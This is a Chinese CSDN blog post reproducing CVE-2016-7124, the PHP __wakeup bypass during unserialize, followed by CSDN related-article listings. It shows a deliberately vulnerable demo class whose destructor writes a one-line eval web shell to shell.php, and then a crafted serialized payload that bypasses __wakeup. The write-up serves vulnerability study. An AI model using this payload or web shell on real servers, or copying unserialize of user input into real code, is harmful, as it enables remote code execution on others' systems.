PHP魔术方法反序列化(CVE-2016-7124)

已于 2022-03-31 15:36:59 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: CVE漏洞复现 文章标签: php 安全 开发语言
于 2022-03-12 14:59:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57379855/article/details/123443260
版权

PHP魔术方法反序列化(CVE-2016-7124)

PHP魔术方法反序列化

PHP5小于5.6.25或PHP7小于7.0.10

_wakeup

在对象被反序列化后被调用

源码分析

<?php
// 目标:反序列化的时候绕过__wakeup以达到写文件的操作
// CVE-2016-7124
// PHP5小于5.6.25或PHP7小于7.0.10
class Test
{
    // 私有成员变量
    private $poc = '';
    public function __construct($poc)
    {
        $this->poc = $poc;
    }

    function __destruct()
    {
        if ($this->poc != '')
        {
            file_put_contents('shell.php', '<?php eval($_POST["shell"]);?>');
           die('Success!!!');
       }
        else
        {
            die('fail to getshell!!!');
        }
    }

    function __wakeup()
    {
        // 返回由对象属性组成的关联数组,把所有的属性置空
        foreach(get_object_vars($this) as $k => $v)
        {
            $this->$k = null;
        }
        echo "waking up...n";
    }
}
$poc = $_GET['poc'];
/*if(!isset($poc))
{
    show_source(__FILE__);
    die();
}*/
print_r("your payload:".$poc);
$a = unserialize($poc);
// PHP5小于5.6.25或PHP7小于7.0.10

在这里插入图片描述

当成员变量的数量大于本身的成员变量的数量,就会跳过_wakeup魔术方法
当销毁的时触发一个生成一句话木马文件的析构函数
满足的条件是这个类的poc成员变量不为空
在这里插入图片描述

但是里面的_wakeup函数将所传的成员变量的值置空
在这里插入图片描述

反序列化成员变量
在这里插入图片描述

所以现在需要绕过这个_wakeup函数执行

php-poc

我们先序列化一下该成员变量
在这里插入图片描述
当成员变量的数量大于本身的成员变量的数量,就会跳过_wakeup魔术方法
所以增加一个成员变量或多个成员变量
O:4:“Test”:2:{s:9:" Testpoc";s:5:“shell”;}

但是要注意的是该poc成员变量是一个私有变量,序列化后与类名进行拼接了
所以可以通过url编码空格%00进行隔开
O:4:“Test”:2:{s:9:"%00Test%00poc";s:5:“shell”;}

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

half~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php时间人性化展示
赛时科技
04-22 139
函数,用于将时间戳转换为人性化的时间差。该函数遍历了不同的时间单位,找到合适的单位来表示时间差,并返回相应的字符串。这样,你就可以根据需要将时间以人性化的方式展示给用户了。你可以根据具体需求调整时间格式和单位。函数将其格式化为"年-月-日 时:分:秒"的形式。然后,我们定义了一个。在上面的示例中,我们首先获取了当前的时间戳,并使用。函数来实现时间的人性化展示。函数将"-2 days"转换为时间戳),然后调用。最后,我们假设有一个过去的时间戳(这里使用。函数将其转换为人性化的时间差,并输出结果。
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
cve漏洞复现 php,PHP 反序列化漏洞学习及CVE-2016-7124漏洞复现
weixin_39780255的博客
03-10 215
序列化与反序列化了解serialize ()serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。简单来讲,就是将对象转化为可以传输的字符串,字符串中存储着对象的变量、类型等。举个例子:test.phpclass test{public $name = "wcute";public $age = "18";}$fairy = new test();ech...
PHP反序列化漏洞-CVE-2016-7124(绕过__wakeup)复现
笑花大王
01-30 2857
前言 最近电脑也不知怎么了时不时断网而且我竟然找不出原因!!!很诡异.... 其他设备电脑都OK唯独我的电脑 时好时坏 我仿佛摸清了我电脑断网的时间段所以作息时间都改变了 今天12点多断网刷了会手机陪家人取超市 看到小区门口都挺严格的进出要身份证 去超市还要测体温。之后回来睡觉到6点起来家里做了火锅hhhhh 吃了之后继续学习序列化漏洞emmmm 等会又该睡觉了 一天又结束了! ...
[漏洞利用] CVE-2016-7124 漏洞复现(总结自一CTF题目)
热门推荐
Y4tacker的博客
07-21 1万+
文章目录漏洞影响的版本漏洞利用方法演示漏洞复现案例代码正常效果修改参数后的效果 漏洞影响的版本 从官网得知 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 演示 可能上面说的有点抽象就拿我今天遇到一道题来做个案例,运行下图 <?php cla
CVE-2016-7124漏洞复现
qq_54735393的博客
11-24 676
如果存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行
反序列化漏洞CVE-2016-7124
记录学习,一起进步
12-16 996
认识反序列化漏洞CVE-2016-7124
__wakeup()函数失效引发漏洞(CVE-2016-7124)
Bendawang's Blog
10-22 6702
CVE-2016-7124
极客大挑战 2019]PHP CVE-2016-7124 绕过__wakeup()
偷一个月亮
09-02 994
极客大挑战 2019]PHP 扫描发现备份源代码www.zip 注意 private私有属性,不能从外面去更改访问 只能从内部函数里面进行更改 源代码如下: __wakeup()是被反序列后自动调用的函数。 自动将属性改为guest但是和后面的admin有所冲突。 O:4:"Name":2:{s:14:"�Name�username";s:5:"admin";s:14:"�Name�password";...
PHP反序列化-__wakeup()方法漏洞CVE-2016-7124
bin789456的博客
08-13 3370
写在前面 wakeup()是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 漏洞影响的版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 漏洞出现情况 1.可以之间或简介控制序列化结果 2.__wakeup(
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
TCP相关问题总结
最新发布
qq_62835094的博客
04-23 1109
假设TCP是两次握手,则可能会发生以下情况客户端发起TCP握手,向服务器发送SYN,但该数据因网络波动滞留此时触发超时重传,重新简历TCP连接当新建立的连接断开后,之前在网络中滞留的SYN连接请求传递到服务端,服务端误以为客户端需要建立TCP连接,因此会发送SYN+ACK请求,并进入连接建立状态,但客户端并不需要建立连接,不会发送数据,因此会造成服务端资源的浪费三次握手可以防止客户端无效连接信息再次到达服务器,导致重新连接之所以需要四次挥手,因为半关闭tcp通道允许双方互相发送数据,数据是双向流动的。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 469
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 735
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
wyqshusan的博客
04-23 534
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实时导航、实时错误检查和代码重构等实用功能。在新版本中,PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其中包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
WordPress自动采集发布AutoPostPro汉化版插件
pengqingwen的博客
04-23 231
WP-AutoPostPro 是一款极为出色的WordPress自动采集发布插件,其显著优势在于能够从任何网站抓取内容并自动将其发布到你的WordPress网站上。它实现了对任何网页内容的自动采集和发布,整个采集过程完全自动化,无需手动操作。此外,它还提供了一系列实用功能,如内容筛选、HTML标签过滤、关键词替换、自动添加链接、自动生成标签、自动将远程图片保存到本地服务器、自动为文章添加前缀和后缀,以及使用微软翻译引擎将采集到的文章自动翻译成多种语言进行发布。
PHP反序列化漏洞 CVE-2016-7124
07-28
CVE-2016-7124是一种PHP反序列化漏洞,影响了PHP版本5.6.25以及之前的版本以及7.0.10以及之前的版本。这个漏洞允许攻击者通过构造恶意的序列化数据来执行任意的PHP代码。 通过利用这个漏洞,攻击者可以在受影响的应用程序中执行远程命令或者获取敏感信息。这种类型的漏洞通常发生在未正确验证和过滤用户输入的情况下。当应用程序使用不可信任的数据进行反序列化操作时,攻击者可以通过精心构造的恶意数据来执行任意的PHP代码。 为了防止CVE-2016-7124漏洞的利用,建议您采取以下措施: 1. 及时更新PHP版本:确保您的PHP版本是最新的,以避免已知的漏洞。 2. 输入验证和过滤:对于从用户获取的数据,进行严格的输入验证和过滤,确保只接受预期的数据格式。 3. 序列化数据验证:在反序列化之前,对接收到的序列化数据进行验证,确保其来源可信。 4. 最小权限原则:将应用程序运行在最小权限的环境中,限制对敏感系统资源的访问权限。 5. 内容安全策略:使用内容安全策略(Content Security Policy)来限制加载和执行外部资源的能力,减少攻击面。 请注意,以上措施只是一些基本的防御建议,具体的安全措施应根据您的应用程序和环境进行定制和实施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值